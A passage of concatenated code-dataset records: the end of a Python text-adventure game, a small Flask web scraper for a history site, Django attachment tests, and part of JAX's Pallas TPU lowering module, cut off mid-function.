location, inventory, enemies):\n if location.current_location == 'space_ship':\n self.current_location_text = 'in your spaceship'\n else:\n self.region_check(location)\n options = 'You may check inventory' + self.current_activities\n print('You are ' + self.current_location_text)\n print(options)\n self.command = input('What would you like to do? ').lower().strip()\n if self.command == 'check inventory':\n print(inventory.player_inventory)\n elif self.command == 'teleport':\n self.teleport(location, location.regions_list)\n elif self.command == 'north':\n if 'north' in location.regions[location.current_location]:\n location.current_location = location.regions[location.current_location]['north']\n else:\n print('Can\\'t go that way!')\n elif self.command == 'east':\n if 'east' in location.regions[location.current_location]:\n location.current_location = location.regions[location.current_location]['east']\n else:\n print('Can\\'t go that way!')\n elif self.command == 'south':\n if 'south' in location.regions[location.current_location]:\n location.current_location = location.regions[location.current_location]['south']\n else:\n print('Can\\'t go that way!')\n elif self.command == 'west':\n if 'west' in location.regions[location.current_location]:\n location.current_location = location.regions[location.current_location]['west']\n else:\n print('Can\\'t go that way!')\n elif self.command == 'mine calcium carbonate':\n if location.regions[location.current_location]['type'] in ['plains', 'mountain']:\n battle_odds = random.randint(1, 2)\n if battle_odds == 1:\n self.battle(enemies.enemies['slime'], 'slime', 'tackle', 'none', 'gel',\n inventory.weapon['ammo'], inventory)\n inventory.player_inventory['calcium_carbonate'] += 10\n print('You have ' + str(inventory.player_inventory['calcium_carbonate']) + ' calcium carbonate')\n elif self.command == 'mine carbon':\n if location.regions[location.current_location]['type'] in ['swamp', 'forest']:\n battle_odds = random.randint(1, 2)\n if battle_odds == 1:\n self.battle(enemies.enemies['slime'], 'slime', 'tackle', 'none', 'gel',\n inventory.weapon['ammo'], inventory)\n inventory.player_inventory['carbon'] += 10\n print('You have ' + str(inventory.player_inventory['carbon']) + ' carbon')\n else:\n print('I don\\'t understand that command')\n\n\n\n","sub_path":"activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":10057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"524255052","text":"from flask import Flask, request, jsonify, make_response\nfrom bs4 import BeautifulSoup\nimport requests\n\napp = Flask(__name__)\n\n@app.route('/historyToday', methods=['GET'])\ndef historyToday():\n\tsoup = BeautifulSoup(requests.get(\"http://www.todayonhistory.com/\").content, 'html.parser', from_encoding='utf-8')\n\tresult = []\n\timgDiv = soup.find_all('div', 'pic')\n\tfor index, iD in enumerate(imgDiv):\n\t\tif iD.a and iD.a.img:\n\t\t\ttemp = iD.a.img\n\t\t\tsrc = temp['data-original']\n\t\t\tif src[0] == '/':\n\t\t\t\tsrc = 'http://www.todayonhistory.com' + src\n\t\t\tresult.append({'src': src, 'year': iD.find_previous_sibling().span.b.text, 'title': temp['alt']})\n\n\tresponse = make_response(jsonify({'result': result}))\n\t# 设置cors 允许跨域\n\tresponse.headers['Access-Control-Allow-Origin'] = '*'\n\tresponse.headers['Access-Control-Allow-Methods'] = 'POST'\n\tresponse.headers['Access-Control-Allow-Headers'] = 'x-requested-with,content-type'\n\treturn\tresponse\napp.run()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"483355533","text":"from django.test import TestCase\nfrom django.test.client import Client\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.files import File\n\nfrom attachments.models import Attachment, TestModel\n\nimport os\nfrom tempfile import NamedTemporaryFile\n\n\"\"\"\n\n>>> from attachments.models import Attachment, TestModel\n>>> from django.contrib.auth.models import User\n>>> from django.contrib.contenttypes.models import ContentType\n\n>>> import os\n>>> TEST_DIR = os.path.join(os.path.dirname(__file__))\n>>> TEST_FILE1 = os.path.join(TEST_DIR, \"models.py\")\n>>> TEST_FILE2 = os.path.join(TEST_DIR, \"views.py\")\n\n>>> bob = User(username=\"bob\")\n>>> bob\n\n>>> bob.save()\n\n>>> tm = TestModel(name=\"Test1\")\n>>> tm.name\n'Test1'\n>>> tm.save()\n\n\n>>> att1 = Attachment.objects.create_for_object(\n... tm, file=TEST_FILE1, attached_by=bob, title=\"Something\",\n... summary=\"Something more\")\n>>> att1\n\n\n\n>>> att2 = Attachment.objects.create_for_object(\n... tm, file=TEST_FILE2, attached_by=bob, title=\"Something Else\",\n... summary=\"Something else more\")\n>>> att2\n\n\n>>> Attachment.objects.attachments_for_object(tm)\n[, ]\n\"\"\"\n\nclass TestAttachmentCopying(TestCase):\n def setUp(self):\n self.client = Client(REMOTE_ADDR='localhost')\n self.bob = User(username=\"bob\")\n self.bob.save()\n\n self.tm = TestModel(name=\"Test1\")\n self.tm.save()\n self.tm2 = TestModel(name=\"Test2\")\n self.tm2.save()\n\n self.test_file1 = NamedTemporaryFile('w+')\n self.test_file1.write(\"some test text\")\n self.test_file1.flush()\n self.test_file1.seek(0)\n\n self.test_file2 = NamedTemporaryFile('w+')\n self.test_file2.write(\"some test text\")\n self.test_file2.flush()\n self.test_file2.seek(0)\n\n def testDeepCopying(self):\n \"\"\"\n Test that doing a deep copy of a file actually attempt to create a\n second version of a file.\n \"\"\"\n att1 = Attachment.objects.create_for_object(\n self.tm, file=self.test_file1, attached_by=self.bob,\n title=\"Something\", summary=\"Something\")\n f = File(self.test_file1)\n att1.file.save('models.py', f)\n\n att2 = att1.copy(self.tm2, deepcopy=True)\n\n # Ensure the saved_copy uses its proper file path\n attachments = Attachment.objects.attachments_for_object(self.tm2)\n for attachment in attachments:\n self.assertEqual(\n attachment.file.name,\n Attachment.get_attachment_dir(attachment,\n attachment.file_name())\n )","sub_path":"attachments/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154900173","text":"# Copyright 2023 The JAX Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Module for lowering JAX to Mosaic-compatible MLIR dialects.\"\"\"\nfrom __future__ import annotations\n\nimport dataclasses\nimport functools\nfrom typing import Any, Callable, Sequence\n\nfrom jax import core as jax_core\nfrom jax import lax\nfrom jax import tree_util\nfrom jax._src import custom_derivatives\nfrom jax._src import debugging\nfrom jax._src import linear_util as lu\nfrom jax._src import pjit\nfrom jax._src import source_info_util\nfrom jax._src import state\nfrom jax._src.interpreters import mlir\nfrom jax._src.interpreters import partial_eval as pe\nfrom jax._src.lax.control_flow import for_loop\nfrom jax._src.lib.mlir import ir\nfrom jax._src.lib.mlir.dialects import arith\nfrom jax._src.lib.mlir.dialects import func\nfrom jax._src.lib.mlir.dialects import math\nfrom jax._src.lib.mlir.dialects import memref\nfrom jax._src.lib.mlir.dialects import scf\nfrom jax._src.lib.mlir.dialects import vector\nfrom jax._src.pallas import core\nfrom jax._src.pallas import indexing\nfrom jax._src.pallas import primitives\nfrom jax._src.pallas import utils as pallas_utils\nfrom jax._src.pallas.mosaic import core as tpu_core\nfrom jax._src.pallas.mosaic import primitives as tpu_primitives\nfrom jax._src.state import discharge as state_discharge\nfrom jax._src.state import primitives as state_primitives\nfrom jax._src.util import safe_map\nfrom jax._src.util import safe_zip\nfrom jax._src.util import split_list\nfrom jax._src.util import unzip2\nfrom jax.experimental.mosaic.dialects import tpu\nimport jax.numpy as jnp\nimport numpy as np\n\n# TODO(sharadmv): enable type checking\n# mypy: ignore-errors\n\nNDIndexer = indexing.NDIndexer\nTPUMemorySpace = tpu_core.TPUMemorySpace\nVMEM = tpu_core.TPUMemorySpace.VMEM\nSMEM = tpu_core.TPUMemorySpace.SMEM\n\npartial = functools.partial\nmap, unsafe_map = safe_map, map # pylint: disable=redefined-builtin\nzip, unsafe_zip = safe_zip, zip # pylint: disable=redefined-builtin\n\n\n@dataclasses.dataclass\nclass LoweringContext:\n ir_context: ir.Context\n grid_mapping: core.GridMapping | None\n grid_indices: Sequence[ir.Value] | None\n block_shapes: list[tuple[int | core.Mapped, ...]]\n name_stack: source_info_util.NameStack\n replace = dataclasses.replace\n\n\n@dataclasses.dataclass\nclass LoweringRuleContext:\n lowering_context: LoweringContext\n avals_in: Sequence[jax_core.AbstractValue]\n avals_out: Sequence[jax_core.AbstractValue]\n block_shapes: list[tuple[int | core.Mapped, ...]] | None\n\n replace = dataclasses.replace\n\n\ndef _memory_space_to_tpu_memspace(memory_space: TPUMemorySpace | None\n ) -> ir.Attribute:\n if memory_space is None:\n memory_space = VMEM\n return ir.Attribute.parse(f\"#tpu.memory_space<{memory_space}>\")\n\n\ndef aval_to_ir_type(aval, shape=None, memory_space: TPUMemorySpace | None = None):\n if shape is None:\n shape = aval.shape\n if isinstance(aval, state.AbstractRef):\n memspace = _memory_space_to_tpu_memspace(memory_space)\n return ir.MemRefType.get(shape, mlir.dtype_to_ir_type(aval.dtype),\n memory_space=memspace)\n elif isinstance(aval, jax_core.ShapedArray):\n if shape == ():\n return mlir.dtype_to_ir_type(aval.dtype)\n return ir.VectorType.get(shape, mlir.dtype_to_ir_type(aval.dtype))\n raise NotImplementedError(aval)\n\n\ndef ir_constant(x, mlir_type=None):\n if not hasattr(x, \"dtype\"):\n if isinstance(x, int):\n x = np.array(x, np.int32)\n elif isinstance(x, float):\n x = np.array(x, np.float32)\n if not mlir_type:\n mlir_type = mlir.dtype_to_ir_type(x.dtype)\n if isinstance(x, int) or x.dtype == np.int32 or x.dtype == np.uint32:\n return arith.ConstantOp(mlir_type, ir.IntegerAttr.get(mlir_type, int(x))\n ).result\n elif isinstance(x, float) or x.dtype == np.float32:\n return arith.ConstantOp(\n mlir_type, ir.FloatAttr.get(mlir_type, float(x))\n ).result\n elif x.dtype == jnp.bfloat16:\n return arith.ConstantOp(\n mlir_type, ir.FloatAttr.get(mlir_type, float(x))\n ).result\n elif x.dtype == jnp.bool_:\n return arith.ConstantOp(\n mlir_type, ir.BoolAttr.get(bool(x))\n ).result\n raise NotImplementedError(x.dtype)\n\n\nlowering_rules = {}\n\n\ndef lower_jaxpr_to_module(\n ctx: ir.Context,\n grid_mapping: core.GridMapping,\n jaxpr: jax_core.Jaxpr,\n dimension_semantics: tuple[str | None, ...] | None,\n memory_spaces: tuple[TPUMemorySpace | None, ...] | None\n) -> ir.Module:\n m = ir.Module.create()\n sym_tab = ir.SymbolTable(m.operation)\n if all(bm is None for bm in grid_mapping.block_mappings):\n # Trivial grid-map, we don't need to populate the transform functions.\n func_op = lower_jaxpr_to_func(ctx, jaxpr, grid_mapping=grid_mapping,\n memory_spaces=memory_spaces,\n name=\"main\")\n m.body.append(func_op)\n sym_tab.insert(func_op)\n return m\n func_op = lower_jaxpr_to_func(ctx, jaxpr, grid_mapping=grid_mapping,\n memory_spaces=memory_spaces,\n name=\"main\")\n m.body.append(func_op)\n sym_tab.insert(func_op)\n num_smem_inputs = grid_mapping.num_index_operands\n window_params = []\n grid = grid_mapping.grid\n for i, bm in enumerate(grid_mapping.block_mappings):\n func_name = f\"transform_{i}\"\n if bm.index_map_jaxpr.consts:\n raise NotImplementedError(\"Index map jaxpr with consts not supported.\")\n mlir_func = lower_jaxpr_to_transform_func(\n ctx,\n bm.index_map_jaxpr.jaxpr,\n [*[None] * len(grid), *[SMEM] * num_smem_inputs],\n name=func_name)\n assert mlir_func.verify(), mlir_func\n block_shape = [\n 1 if b is core.mapped else b for b in bm.block_shape\n ]\n window_shape = ir.DenseI64ArrayAttr.get(block_shape)\n window_params.append(\n ir.DictAttr.get(\n dict(\n window_bounds=window_shape,\n transform_indices=ir.FlatSymbolRefAttr.get(func_name),\n )\n )\n )\n m.body.append(mlir_func)\n sym_tab.insert(mlir_func)\n func_op.attributes[\"scalar_prefetch\"] = ir.IntegerAttr.get(\n ir.IntegerType.get_signless(64), num_smem_inputs)\n func_op.attributes[\"window_params\"] = ir.ArrayAttr.get(window_params)\n func_op.attributes[\"iteration_bounds\"] = ir.DenseI64ArrayAttr.get(\n grid_mapping.grid\n )\n\n def _get_semantics(s: str | None) -> str:\n if s is None:\n return \"#tpu.dimension_semantics\"\n return f\"#tpu.dimension_semantics<{s}>\"\n\n if dimension_semantics is None:\n func_dimension_semantics = [\n _get_semantics(\"parallel\")\n if i in grid_mapping.mapped_dims\n else _get_semantics(None)\n for i, d in enumerate(grid_mapping.grid)\n ]\n else:\n dimension_semantics_iter = iter(dimension_semantics)\n func_dimension_semantics = [\n _get_semantics(\"parallel\")\n if i in grid_mapping.mapped_dims\n else _get_semantics(next(dimension_semantics_iter))\n for i, d in enumerate(grid_mapping.grid)\n ]\n func_op.attributes[\"dimension_semantics\"] = ir.ArrayAttr.get(\n map(ir.Attribute.parse, func_dimension_semantics)\n )\n return m\n\n\ndef lower_jaxpr_to_transform_func(\n ctx: ir.Context, jaxpr: jax_core.Jaxpr, memspaces: Sequence[Any],\n *, name: str) -> func.FuncOp:\n block_shapes = [i.aval.shape for i in jaxpr.invars]\n arg_types = [*map(aval_to_ir_type, [invar.aval for invar in jaxpr.invars],\n block_shapes, memspaces)]\n lowering_context = LoweringContext(\n ctx, None, None, block_shapes, source_info_util.NameStack())\n body_func = functools.partial(jaxpr_subcomp, lowering_context, jaxpr)\n body_func.__name__ = name\n body = func.FuncOp.from_py_func(*arg_types, name=name)(body_func)\n body.func_op.verify()\n return body.func_op\n\ndef lower_fun(fun: Callable, *, multiple_results: bool) -> Callable:\n def f_lowered(ctx: LoweringRuleContext, *args, **params):\n f = fun if multiple_results else lambda *args, **kw: (fun(*args, **kw),)\n wrapped_fun = lu.wrap_init(f, params)\n jaxpr, _, consts = pe.trace_to_jaxpr_dynamic(wrapped_fun, ctx.avals_in)\n if consts:\n raise NotImplementedError\n jaxpr = pe.convert_constvars_jaxpr(jaxpr)\n lowering_context = ctx.lowering_context.replace(\n block_shapes=ctx.block_shapes)\n out = jaxpr_subcomp(lowering_context, jaxpr, *consts, *args)\n if not multiple_results:\n return out[0]\n return out\n\n return f_lowered\n\n\ndef lower_jaxpr_to_func(\n ctx: ir.Context,\n jaxpr: jax_core.Jaxpr,\n *,\n memory_spaces: Sequence[tpu_core.TPUMemorySpace | None] | None,\n grid_mapping: core.GridMapping | None,\n name: str,\n) -> func.FuncOp:\n if grid_mapping:\n arg_types = map(\n aval_to_ir_type,\n [jax_core.ShapedArray((), jnp.int32) for _ in grid_mapping.grid],\n )\n else:\n arg_types = []\n\n def _get_arg_type(aval, block_mapping: core.BlockMapping | None,\n memory_space: tpu_core.TPUMemorySpace | None):\n if block_mapping is None:\n return aval_to_ir_type(aval, memory_space=memory_space), aval.shape\n shape = tuple(\n 1 if b is core.mapped else b for b in block_mapping.block_shape\n )\n return (aval_to_ir_type(aval, shape=shape, memory_space=memory_space),\n block_mapping.block_shape)\n if memory_spaces is None:\n memory_spaces = [None] * len(jaxpr.invars)\n if len(memory_spaces) != len(jaxpr.invars):\n raise ValueError(\"Must have as many memory spaces as inputs and outputs.\")\n if grid_mapping is None:\n block_mappings = [None] * len(jaxpr.invars)\n else:\n scalar_prefetch = grid_mapping.num_index_operands\n block_mappings = grid_mapping.block_mappings\n block_mappings = [*[None] * scalar_prefetch, *block_mappings]\n for memory_space in memory_spaces[:scalar_prefetch]:\n if memory_space is not None and memory_space != SMEM:\n raise ValueError(\"Cannot specify non-SMEM memory space for \"\n \"scalar prefetch inputs.\")\n memory_spaces = memory_spaces[scalar_prefetch:]\n memory_spaces = [*[SMEM] * scalar_prefetch, *memory_spaces]\n invar_arg_types, block_shapes = unzip2(\n map(_get_arg_type, [invar.aval for invar in jaxpr.invars], block_mappings,\n memory_spaces)\n )\n arg_types = [*arg_types, *invar_arg_types]\n if grid_mapping:\n\n def body_func(*args):\n grid_indices, args = split_list(args, [len(grid_mapping.grid)])\n grid_indices = [\n g\n for i, g in enumerate(grid_indices)\n if i not in grid_mapping.mapped_dims\n ]\n lowering_context = LoweringContext(\n ctx,\n grid_mapping,\n tuple(grid_indices),\n block_shapes,\n source_info_util.NameStack(),\n )\n return jaxpr_subcomp(lowering_context, jaxpr, *args)\n\n else:\n lowering_context = LoweringContext(\n ctx, None, None, block_shapes, source_info_util.NameStack()\n )\n body_func = functools.partial(jaxpr_subcomp, lowering_context, jaxpr)\n body_func.__name__ = name\n body = func.FuncOp.from_py_func(*arg_types, name=name)(body_func)\n body.func_op.verify()\n return body.func_op\n\n\ndef jaxpr_subcomp(\n ctx: LoweringContext, jaxpr: jax_core.Jaxpr, *args: ir.Value\n) -> Sequence[ir.Value]:\n assert not jaxpr.constvars\n env = {}\n block_shape_env = {}\n\n def read_block_shape(atom: jax_core.Atom):\n if isinstance(atom, jax_core.Literal):\n return None\n return block_shape_env.get(atom, None)\n\n def read_env(atom: jax_core.Atom):\n return atom.val if isinstance(atom, jax_core.Literal) else env[atom]\n\n def write_env(var: jax_core.Var, val):\n assert isinstance(val, ir.Value), type(val)\n env[var] = val\n\n for invar, bs in zip(jaxpr.invars, ctx.block_shapes):\n block_shape_env[invar] = bs\n map(write_env, jaxpr.invars, args)\n\n for eqn in jaxpr.eqns:\n invals = map(read_env, eqn.invars)\n source_info = eqn.source_info.replace(\n name_stack=ctx.name_stack + eqn.source_info.name_stack\n )\n loc = mlir._source_info_to_location(\n eqn.primitive, eqn.params, source_info, ctx.name_stack\n )\n with source_info_util.user_context(eqn.source_info.traceback), loc:\n if eqn.primitive in lowering_rules:\n block_shapes = map(read_block_shape, eqn.invars)\n rule_context = LoweringRuleContext(\n ctx,\n [v.aval for v in eqn.invars],\n [v.aval for v in eqn.outvars],\n block_shapes,\n )\n ans = lowering_rules[eqn.primitive](rule_context, *invals, **eqn.params)\n else:\n raise NotImplementedError(\n \"Unimplemented primitive in Pallas TPU lowering: \"\n f\"{eqn.primitive.name}. \"\n \"Please file an issue on https://github.com/google/jax/issues.\")\n if eqn.primitive.multiple_results:\n map(write_env, eqn.outvars, ans)\n else:\n write_env(eqn.outvars[0], ans)\n outvals = map(read_env, jaxpr.outvars)\n outvals = [\n ir_constant(x) if isinstance(var, jax_core.Literal) else x\n for x, var in zip(outvals, jaxpr.outvars)\n ]\n return outvals\n\n\ndef _convert_flat_indexing_to_indexer(ref_aval, non_slice_idx,\n non_slice_idx_avals, indexed_dims):\n non_slice_idx_iter = iter(zip(non_slice_idx, non_slice_idx_avals))\n splatted_idx_idx_avals = tuple(\n next(non_slice_idx_iter)\n if indexed\n else (primitives.Slice(0, s), primitives.Slice(0, s))\n for s, indexed in zip(ref_aval.shape,indexed_dims)\n )\n splatted_idx, splatted_idx_avals = unzip2(splatted_idx_idx_avals)\n if non_slice_idx:\n (int_indexer_shape,) = set([idx_aval.shape for idx_aval\n in splatted_idx_avals\n if not isinstance(idx_aval, primitives.Slice)])\n else:\n int_indexer_shape = ()\n nd_indexer = NDIndexer(splatted_idx, ref_aval.shape, int_indexer_shape)\n nd_indexer_avals = NDIndexer(splatted_idx_avals, ref_aval.shape,\n int_indexer_shape)\n return nd_indexer, nd_indexer_avals\n\n\ndef _get_lowering_rule(\n ctx: LoweringRuleContext, ref, *non_slice_idx, indexed_dims: Sequence[bool]\n):\n # Call _load_lowering_rule (since it's more general)\n ref_aval, *non_slice_idx_avals = ctx.avals_in\n nd_indexer, nd_indexer_avals = _convert_flat_indexing_to_indexer(\n ref_aval, non_slice_idx, non_slice_idx_avals, indexed_dims)\n flat_args, tree = tree_util.tree_flatten((nd_indexer,))\n flat_avals = tree_util.tree_leaves((nd_indexer_avals,))\n ctx = ctx.replace(avals_in=(ref_aval, *flat_avals))\n return _load_lowering_rule(ctx, ref, *flat_args, args_tree=tree,\n masked=False)\n\n\nlowering_rules[state_primitives.get_p] = _get_lowering_rule\n\n\ndef _swap_lowering_rule(\n ctx: LoweringRuleContext,\n ref,\n val,\n *non_slice_idx,\n indexed_dims: Sequence[bool],\n):\n # Call _masked_swap_lowering_rule (since it's more general)\n ref_aval, val_aval, *non_slice_idx_avals = ctx.avals_in\n nd_indexer, nd_indexer_avals = _convert_flat_indexing_to_indexer(\n ref_aval, non_slice_idx, non_slice_idx_avals, indexed_dims)\n flat_args, tree = tree_util.tree_flatten((nd_indexer,))\n flat_avals = tree_util.tree_leaves((nd_indexer_avals,))\n ctx = ctx.replace(avals_in=(ref_aval, val_aval, *flat_avals))\n return _masked_swap_lowering_rule(ctx, ref, val, *flat_args, args_tree=tree,\n masked=False)\n\nlowering_rules[state_primitives.swap_p] = _swap_lowering_rule\n\n\ndef _make_index(s):\n if isinstance(s, (int, np.ndarray)):\n return ir_constant(s, ir.IndexType.get())\n if s.type == ir.IndexType.get():\n return s\n return arith.IndexCastOp(ir.IndexType.get(), s).result\n\n\ndef _load_lowering_rule(\n ctx: LoweringRuleContext, ref, *args, args_tree, masked, **params\n):\n ref_type = ir.MemRefType(ref.type)\n is_smem_load = str(ref_type.memory_space) == \"#tpu.memory_space\"\n del params\n if masked:\n raise NotImplementedError\n ref_aval, *_ = ctx.avals_in\n (aval_out,) = ctx.avals_out\n ref_block_shape, *_ = ctx.block_shapes\n idx, *_ = tree_util.tree_unflatten(args_tree, args)\n idx_aval, *_ = tree_util.tree_unflatten(args_tree, ctx.avals_in[1:])\n indices = idx.indices\n if not ref_block_shape:\n raise NotImplementedError(\n \"Indexing into a ()-shaped Ref not yet supported on TPU.\")\n if any(\n not isinstance(a, primitives.Slice) and a.shape != ()\n for a in idx_aval.indices\n ):\n raise ValueError(\"Cannot do int indexing on TPU\")\n starts = tuple(\n i.start if isinstance(i, primitives.Slice) else i for i in indices\n )\n mlir_indices = [\n s if isinstance(s, primitives.Slice) else _make_index(s) for s in starts\n ]\n # Need to now insert indexing the 0-th element for mapped dimensions\n idx_iter = iter(mlir_indices)\n mlir_indices = [\n _make_index(0) if b is core.mapped else next(idx_iter)\n for b in ref_block_shape\n ]\n assert len(mlir_indices) == len(ref_block_shape)\n load_shape = list(aval_out.shape)\n for i, a in enumerate(idx_aval.indices):\n if not isinstance(a, primitives.Slice):\n load_shape.insert(i, 1)\n assert len(load_shape) == len(ref_aval.shape)\n load_shape_iter = iter(load_shape)\n load_shape = [\n 1 if b is core.mapped else next(load_shape_iter) for b in ref_block_shape\n ]\n load_aval = aval_out.update(shape=tuple(load_shape))\n if is_smem_load:\n if ctx.avals_out[0].shape:\n raise ValueError(\"Can only load scalars from SMEM:\")\n return memref.LoadOp(ref, mlir_indices).result\n else:\n load_val = vector.LoadOp(aval_to_ir_type(load_aval), ref, mlir_indices).result\n if load_aval == aval_out:\n return load_val\n vec_type = ir.VectorType.get(aval_out.shape,\n mlir.dtype_to_ir_type(aval_out.dtype))\n return vector.ShapeCastOp(vec_type, load_val).result\n\n\nlowering_rules[primitives.load_p] = _load_lowering_rule\n\n\ndef _masked_swap_lowering_rule(\n ctx: LoweringRuleContext, ref, val, *args, args_tree, masked, **params\n):\n del params\n if masked:\n raise NotImplementedError\n ref_block_shape, *_ = ctx.block_shapes\n ref_aval, val_aval, *_ = ctx.avals_in\n (aval_out,) = ctx.avals_out\n if not isinstance(val, ir.Value):\n val = ir_constant(val, mlir_type=mlir.dtype_to_ir_type(val_aval.dtype))\n idx, *_ = tree_util.tree_unflatten(args_tree, args)\n idx_aval, *_ = tree_util.tree_unflatten(args_tree, ctx.avals_in[2:])\n indices = idx.indices\n if any(\n not isinstance(a, primitives.Slice) and a.shape != ()\n for a in idx_aval.indices\n ):\n raise ValueError(\"Cannot do int indexing on TPU\")\n if not ref_block_shape:\n raise NotImplementedError(\n \"Indexing into a ()-shaped Ref not yet supported on TPU.\")\n starts = tuple(\n i.start if isinstance(i, primitives.Slice) else i for i in indices\n )\n mlir_indices = [\n s if isinstance(s, primitives.Slice) else _make_index(s) for s in starts\n ]\n # Need to now insert indexing the 0-th element for mapped dimensions\n idx_iter = iter(mlir_indices)\n mlir_indices = [\n _make_index(0) if b is core.mapped else next(idx_iter)\n for b in ref_block_shape\n ]\n assert len(mlir_indices) == len(ref_block_shape)\n mem_slice_shape = list(aval_out.shape)\n for i, a in enumerate(idx_aval.indices):\n if not isinstance(a, primitives.Slice):\n mem_slice_shape.insert(i, 1)\n mem_slice_shape_iter = iter(mem_slice_shape)\n mem_slice_shape = [\n 1 if b is core.mapped else next(mem_slice_shape_iter)\n for b in ref_block_shape\n ]\n mem_aval = aval_out.update(shape=tuple(mem_slice_shape))\n mem_aval_vec_type = ir.VectorType.get(mem_aval.shape,\n mlir.dtype_to_ir_type(mem_aval.dtype))\n result = vector.LoadOp(mem_aval_vec_type, ref, mlir_indices).result\n if mem_aval != aval_out:\n # We are slicing a scalar so provided dummy 1 indices\n result_vec_type = ir.VectorType.get(aval_out.shape,\n mlir.dtype_to_ir_type(aval_out.dtype))\n result = vector.ShapeCastOp(result_vec_type, result).result\n val_vec_type = ir.VectorType.get(mem_aval.shape,\n mlir.dtype_to_ir_type(mem_aval.dtype))\n val = vector.ShapeCastOp(val_vec_type, val).result\n vector.StoreOp(val, ref, mlir_indices)\n return result\n\n\nlowering_rules[primitives.swap_p] = _masked_swap_lowering_rule\n\n\ndef _multiple_of_lowering_rule(ctx: LoweringRuleContext, val, *, values):\n del values\n return val\n\n\nlowering_rules[primitives.multiple_of_p] = _multiple_of_lowering_rule\n\n\ndef _reduce_max_lowering_rule(ctx: LoweringRuleContext, x, *, axes):\n (x_aval,) = ctx.avals_in\n out_type = aval_to_ir_type(ctx.avals_out[0])\n if jnp.issubdtype(x_aval.dtype, jnp.floating):\n kind = ir.Attribute.parse(\"#vector.kind\")\n val = ir.FloatAttr.get(ir.F32Type.get(), float(\"-inf\"))\n identity = ir.DenseElementsAttr.get_splat(out_type, val)\n elif jnp.issubdtype(x_aval.dtype, jnp.signedinteger):\n kind = ir.Attribute.parse(\"#vector.kind\")\n raise NotImplementedError\n elif jnp.issubdtype(x_aval.dtype, jnp.unsignedinteger):\n kind = ir.Attribute.parse(\"#vector.kind\")\n raise NotImplementedError\n acc = arith.ConstantOp(out_type, identity)\n op = vector.MultiDimReductionOp(\n kind,\n x,\n acc,\n ir.ArrayAttr.get(\n [ir.IntegerAttr.get(ir.IntegerType.get_signless(64), a) for a in axes]\n ),\n )\n return op.result\n\n\nlowering_rules[lax.reduce_max_p] = _reduce_max_lowering_rule\n\n\ndef _reduce_sum_lowering_rule(ctx: LoweringRuleContext, x, *, axes):\n (x_aval,) = ctx.avals_in\n out_type = aval_to_ir_type(ctx.avals_out[0])\n if jnp.issubdtype(x_aval.dtype, jnp.floating):\n kind = ir.Attribute.parse(\"#vector.kind\")\n val = ir.FloatAttr.get(ir.F32Type.get(), 0.0)\n identity = ir.DenseElementsAttr.get_splat(out_type, val)\n elif jnp.issubdtype(x_aval.dtype, jnp.signedinteger):\n kind = ir.Attribute.parse(\"#vector.kind\")\n raise NotImplementedError\n elif jnp.issubdtype(x_aval.dtype, jnp.unsignedinteger):\n kind = ir.Attribute.parse(\"#vector.kind\")\n raise NotImplementedError\n acc = arith.ConstantOp(out_type, identity)\n op = vector.MultiDimReductionOp(\n kind,\n x,\n acc,\n ir.ArrayAttr.get(\n [ir.IntegerAttr.get(ir.IntegerType.get_signless(64), a) for a in axes]\n ),\n )\n return op.result\n\n\nlowering_rules[lax.reduce_sum_p] = _reduce_sum_lowering_rule\n\n\ndef _broadcast_in_dim_lowering_rule(\n ctx: LoweringRuleContext, val, *, shape, broadcast_dimensions\n):\n if isinstance(val, (np.generic, np.ndarray, int, float)):\n val = ir_constant(val, mlir.dtype_to_ir_type(ctx.avals_in[0].dtype))\n (aval_in,) = ctx.avals_in\n (aval_out,) = ctx.avals_out\n if broadcast_dimensions:\n out_shape_list = [1] * len(shape)\n for i, s in zip(broadcast_dimensions, aval_in.shape):\n out_shape_list[i] = s\n out_shape = tuple(out_shape_list)\n out_type = ir.VectorType.get(\n out_shape, mlir.dtype_to_ir_type(aval_out.dtype)\n )\n val = vector.ShapeCastOp(out_type, val).result\n if out_shape == aval_out.shape:\n return val\n out_type = ir.VectorType.get(\n aval_out.shape, mlir.dtype_to_ir_type(aval_out.dtype)\n )\n return vector.BroadcastOp(out_type, val).result\n\n\nlowering_rules[lax.broadcast_in_dim_p] = _broadcast_in_dim_lowering_rule\n\n\ndef _dot_general_lowering_rule(\n ctx: LoweringRuleContext, x, y, dimension_numbers, precision, **_\n):\n (lhs_dims, rhs_dims), _ = dimension_numbers\n (aval_out,) = ctx.avals_out\n out_type = aval_to_ir_type(aval_out)\n if ctx.avals_out[0].dtype == jnp.float32:\n val = ir.FloatAttr.get(ir.F32Type.get(), 0.0)\n elif ctx.avals_out[0].dtype == jnp.float16:\n val = ir.FloatAttr.get(ir.F16Type.get(), 0.0)\n else:\n raise NotImplementedError(ctx.avals_out[0].dtype)\n if any(len(a.shape) != 2 for a in ctx.avals_in):\n raise NotImplementedError(ctx.avals_in)\n lhs_aval, _ = ctx.avals_in\n # This is really a matrix-vector product. It only looks like matrix-matrix.\n if lhs_dims == (1,) and rhs_dims == (1,) and ctx.avals_in[1].shape[0] == 1:\n if ctx.avals_in[0].shape != ctx.avals_in[1].shape:\n bcast_shape = jnp.broadcast_shapes(\n ctx.avals_in[0].shape, ctx.avals_out[0].shape\n )\n bcast_shape = ir.VectorType.get(\n list(bcast_shape), mlir.dtype_to_ir_type(ctx.avals_out[0].dtype)\n )\n if ctx.avals_in[0].shape != bcast_shape:\n x = vector.BroadcastOp(bcast_shape, x)\n if ctx.avals_in[1].shape != bcast_shape:\n y = vector.BroadcastOp(bcast_shape, y)\n red_type = 